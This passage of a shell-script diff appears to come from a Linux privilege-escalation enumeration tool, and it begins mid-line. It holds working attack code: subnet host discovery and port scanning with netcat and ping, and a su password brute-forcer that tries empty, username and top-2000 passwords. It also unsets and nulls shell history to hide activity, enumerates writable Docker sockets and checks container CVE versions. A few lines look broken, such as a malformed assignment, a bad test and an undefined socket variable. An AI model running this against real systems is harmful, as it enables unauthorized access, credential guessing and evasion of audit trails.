2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v ncat 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v nc.traditional 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v nc.openbsd 2>/dev/null); +fi +if [ "$FOUND_NC" ]; then + SCAN_BAN_GOOD="$GREEN$FOUND_NC${BLUE} is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" +fi + + +########################################### +#-----------) Main Functions (------------# +########################################### + +echo_not_found (){ + printf $DG"$1 Not Found\n"$NC +} + +warn_exec(){ + $* || echo_not_found $1 +} + +echo_no (){ + printf $DG"No\n"$NC +} + +print_title(){ + if [ "$VERBOSE" ]; then + END_T2_TIME=`date +%s 2>/dev/null` + if [ "$START_T2_TIME" ]; then + TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) + printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC + fi + + END_T1_TIME=`date +%s 2>/dev/null` + if [ "$START_T1_TIME" ]; then + TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME)) + printf $DG"The total section execution took $TOTAL_T1_TIME seconds\n"$NC + echo "" + fi + + START_T1_TIME=`date +%s 2>/dev/null` + fi + + printf ${BLUE}"════════════════════════════════════╣ "$GREEN"$1"${BLUE}" ╠════════════════════════════════════\n"$NC +} + +print_2title(){ + if [ "$VERBOSE" ]; then + END_T2_TIME=`date +%s 2>/dev/null` + if [ "$START_T2_TIME" ]; then + TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) + printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC + echo "" + fi + + START_T2_TIME=`date +%s 2>/dev/null` + fi + + printf ${BLUE}"╔══════════╣ "$GREEN"$1\n"$NC #There are 10 "═" +} + +print_3title(){ + printf ${BLUE}"══╣ "$GREEN"$1\n"$NC #There are 2 "═" +} + +print_list(){ + printf ${BLUE}"═╣ "$GREEN"$1"$NC #There is 1 "═" +} + +print_info(){ + printf "${BLUE}╚ ${ITALIC_BLUE}$1\n"$NC +} + +print_ps (){ + (ls -d /proc/*/ 2>/dev/null | while read f; do + CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess + if [ "$CMDLINE" ]; + then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; + printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; + fi; + done) 2>/dev/null | sort -r +} + +su_try_pwd (){ + BFUSER=$1 + PASSWORDTRY=$2 + trysu=`echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null` + if [ "$trysu" ]; then + echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi +} + +su_brute_user_num (){ + BFUSER=$1 + TRIES=$2 + su_try_pwd $BFUSER "" & #Try without password + su_try_pwd $BFUSER $BFUSER & #Try username as password + su_try_pwd $BFUSER `echo $BFUSER | rev 2>/dev/null` & #Try reverse username as password + if [ "$PASSWORD" ]; then + su_try_pwd $BFUSER $PASSWORD & #Try given password + fi + for i in `seq $TRIES`; do + su_try_pwd $BFUSER `echo $top2000pwds | cut -d " " -f $i` & #Try TOP TRIES of passwords (by default 2000) + sleep 0.007 # To not overload the system + done + wait +} + +check_if_su_brute(){ + error=$(echo "" | timeout 1 su `whoami` -c whoami 2>&1); + if [ ! "`echo $error | grep "must be run from a terminal"`" ]; then + echo "1" + fi +} + +eval_bckgrd(){ + CMD_PARAM="$1" + eval "$1" & + CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ]; then wait; fi +} + + +########################################### +#---------) Internet functions (----------# +########################################### +check_tcp_80(){ + (timeout -s KILL 20 /bin/bash -c '( echo >/dev/tcp/1.1.1.1/80 && echo "Port 80 is accessible" || echo "Port 80 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 80 is not accessible" +} +check_tcp_443(){ + (timeout -s KILL 20 /bin/bash -c '(echo >/dev/tcp/1.1.1.1/443 && echo "Port 443 is accessible" || echo "Port 443 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 443 is not accessible" +} +check_icmp(){ + (timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available" +} +#DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp +#I cannot use this function because timeout doesn't find it, so it's copy/pasted below +check_dns(){ + (timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available" +} + +########################################### +#----------) Network functions (----------# +########################################### +# Adapted from https://github.com/carlospolop/bashReconScan/blob/master/brs.sh + +basic_net_info(){ + print_title "Basic Network Info" + (ifconfig || ip a) 2>/dev/null + echo "" +} + +select_nc (){ + #Select the correct configuration of the netcat found + NC_SCAN="$FOUND_NC -v -n -z -w 1" + $($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1) + if [ $? -eq 2 ] + then + NC_SCAN="timeout 1 $FOUND_NC -v -n" + fi +} + +icmp_recon (){ + #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) + IP3=$(echo $1 | cut -d "." -f 1,2,3) + + (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & + (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & + for j in $(seq 0 254) + do + (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & + done + wait +} + +tcp_recon (){ + #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones + IP3=$(echo $1 | cut -d "." -f 1,2,3) + PORTS=$2 + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " + printf "$NC\n" + + for port in $PORTS; do + for j in $(seq 1 254) + do + ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & + done + wait + done +} + +tcp_port_scan (){ + #Scan open ports of a host. Default: nmap top 1000, but the user can select others + basic_net_info + + print_title "Network Port Scanning" + IP=$1 + PORTS="$2" + PORTS="`echo \"$PORTS\" | tr ',' ' '`" + + if [ -z "$PORTS" ]; then + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " + printf "$NC\n" + PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" + else + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " + printf "$NC\n" + fi + + for port in $PORTS; do + ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & + done + wait +} + +discover_network (){ + #Check if IP and Netmask are correct and the use fping or ping to find hosts + basic_net_info + + print_title "Network Discovery" + + DISCOVERY=$1 + IP=$(echo $DISCOVERY | cut -d "/" -f 1) + NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) + + if [ -z $IP ] || [ -z $NETMASK ]; then + printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC; + printf ${BLUE}"$HELP"$NC; + exit 0 + fi + + #Using fping if possible + if [ "$FPING" ]; then + $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${SED_RED}," + + #Loop using ping + else + if [ $NETMASK -eq "24" ]; then + printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC" + icmp_recon $IP + + elif [ $NETMASK -eq "16" ]; then + printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC" + for i in $(seq 1 254) + do + NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 + icmp_recon $NEWIP + done + else + printf $RED"[-] Err: Sorry, only Netmask /24 and /16 supported in ping mode. Netmask detected: $NETMASK"$NC; + exit 0 + fi + fi +} + +discovery_port_scan (){ + basic_net_info + + #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 + print_title "Network Discovery (scanning ports)" + DISCOVERY=$1 + MYPORTS=$2 + + IP=$(echo $DISCOVERY | cut -d "/" -f 1) + NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) + echo "Scanning: $DISCOVERY" + + if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" = "$NETMASK" ]; then + printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24\n"$NC; + if [ "$IP" = "$NETMASK" ]; then + printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: ${YELLOW}-i [-p ]\n\n"$NC; + fi + printf ${BLUE}"$HELP"$NC; + exit 0 + fi + + PORTS="22 80 443 445 3389 `echo \"$MYPORTS\" | tr \",\" \" \"`" + PORTS=`echo "$PORTS" | tr " " "\n" | sort -u` #Delete repetitions + + if [ "$NETMASK" -eq "24" ]; then + printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC + tcp_recon $IP "$PORTS" + + elif [ "$NETMASK" -eq "16" ]; then + printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC + for i in $(seq 0 255) + do + NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 + tcp_recon $NEWIP "$PORTS" + done + else + printf $RED"[-] Err: Sorry, only netmask /24 and /16 are supported in port discovery mode. Netmask detected: $NETMASK\n"$NC; + exit 0 + fi +} + + +########################################### +#---) Exporting history env variables (---# +########################################### + +if ! [ "$NOTEXPORT" ]; then + unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH + export HISTFILE=/dev/null + export HISTSIZE=0 + export HISTFILESIZE=0 +fi + + +########################################### +#---------) Container functions (---------# +########################################### + +containerCheck() { + inContainer="" + containerType="`echo_no`" + + # Are we inside docker? + if [ -f "/.dockerenv" ] || + grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || + grep -qai docker /proc/self/cgroup 2>/dev/null || + [ "`find / -maxdepth 3 -name \"*dockerenv*\" -exec ls -la {} \; 2>/dev/null`" ] ; then + + inContainer="1" + containerType="docker" + fi + + # Are we inside kubenetes? + if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || + grep -qai kubepods /proc/self/cgroup 2>/dev/null; then + + inContainer="1" + if [ "$containerType" ]; then containerType="$containerType (kubernetes)" + else containerType="kubernetes" + fi + fi + + # Are we inside LXC? + if env | grep "container=lxc" -qa 2>/dev/null || + grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then + + inContainer="1" + containerType="lxc" + fi + + # Are we inside podman? + if env | grep -qa "container=podman" 2>/dev/null || + grep -qa "container=podman" /proc/1/environ 2>/dev/null; then + + inContainer="1" + containerType="podman" + fi + + # Check for other container platforms that report themselves in PID 1 env + if [ -z "$inContainer" ]; then + if grep -a 'container=' /proc/1/environ 2>/dev/null; then + inContainer="1" + containerType="`grep -a 'container=' /proc/1/environ | cut -d= -f2`" + fi + fi +} + +inDockerGroup() { + DOCKER_GROUP="No" + if groups 2>/dev/null | grep -q '\bdocker\b'; then + DOCKER_GROUP="Yes" + fi +} + +checkDockerRootless() { + DOCKER_ROOTLESS="No" + if docker info 2>/dev/null|grep -q rootless; then + DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)" + fi +} + +enumerateDockerSockets() { + dockerVersion="`echo_not_found`" + if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then + SEARCHED_DOCKER_SOCKETS="1" + for dock_sock in `find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null`; do + if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then + echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" + echo "Docker enummeration:" + docker_enumerated="" + + if [ "$(command -v curl)" ]; then + sockInfoResponse="`curl -s --unix-socket \"$dockerSockPath\" http://localhost/info`" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) + echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi + fi + + if [ "$(command -v docker)" ] and ![ "$docker_enumerated" ]; then + sockInfoResponse="`docker info`" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) + printf $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + fi + + else + echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g" + fi + done + fi +} + +checkDockerVersionExploits() { + if [ "`echo \"$dockerVersion\" | grep -i \"not found\"`" ]; then + VULN_CVE_2019_13139="`echo_not_found`" + VULN_CVE_2019_5736="`echo_not_found`" + return + fi + + VULN_CVE_2019_13139="`echo_no`" + if [ "`echo \"$dockerVersion\" | sed 's,\.,,g'`" -lt "1895" ]; then + VULN_CVE_2019_13139="Yes" + fi + + VULN_CVE_2019_5736="`echo_no`" + if [ "`echo \"$dockerVersion\" | sed 's,\.,,g'`" -lt "1893" ]; then + VULN_CVE_2019_5736="Yes" + fi +} + +checkContainerExploits() { + VULN_CVE_2019_5021="`echo_no`" + if [ -f "/etc/alpine-release" ]; then + alpineVersion=$(cat /etc/alpine-release) + if [ "`echo \"$alpineVersion\" | sed 's,\.,,g'`" -ge "330" ] && [ "`echo \"$alpineVersion\" | sed 's,\.,,g'`" -le "360" ]; then + VULN_CVE_2019_5021="Yes" + fi + fi +} + + +########################################### +#-----------) Some Basic Info (-----------# +########################################### + +print_title "Basic information" +printf $LG"OS: "$NC +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +printf $LG"User & Groups: "$NC +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${SED_RED},g" +printf $LG"Hostname: "$NC +hostname 2>/dev/null +printf $LG"Writable folder: "$NC; +echo $Wfolder +if [ "$DISCOVER_BAN_GOOD" ]; then + printf ${YELLOW}"[+] $DISCOVER_BAN_GOOD\n"$NC +else + printf $RED"[-] $DISCOVER_BAN_BAD\n"$NC +fi + +if [ "$SCAN_BAN_GOOD" ]; then + printf ${YELLOW}"[+] $SCAN_BAN_GOOD\n"$NC +else + printf $RED"[-] $SCAN_BAN_BAD\n"$NC +fi +if [ "`command -v nmap 2>/dev/null`" ];then + NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" + printf ${YELLOW}"[+] $NMAP_GOOD\n"$NC +fi +echo "" +echo "" + +########################################### +#--------) Check if network jobs (--------# +########################################### +if [ "$PORTS" ]; then + if [ "$SCAN_BAN_GOOD" ]; then + if [ "`echo -n $PORTS | sed 's,[0-9, ],,g'`" ]; then + printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; + printf ${BLUE}"$HELP"$NC; + exit 0 + else + #Select the correct configuration of the netcat found + select_nc + fi + else + printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; + printf ${BLUE}"$HELP"$NC; + exit 0 + fi +fi + +if [ "$DISCOVERY" ]; then + if [ "$PORTS" ]; then + discovery_port_scan $DISCOVERY $PORTS + else + if [ "$DISCOVER_BAN_GOOD" ]; then + discover_network $DISCOVERY + else + printf $RED" Err: Discovery not possible, no fping or ping in PATH\n"$NC; + fi 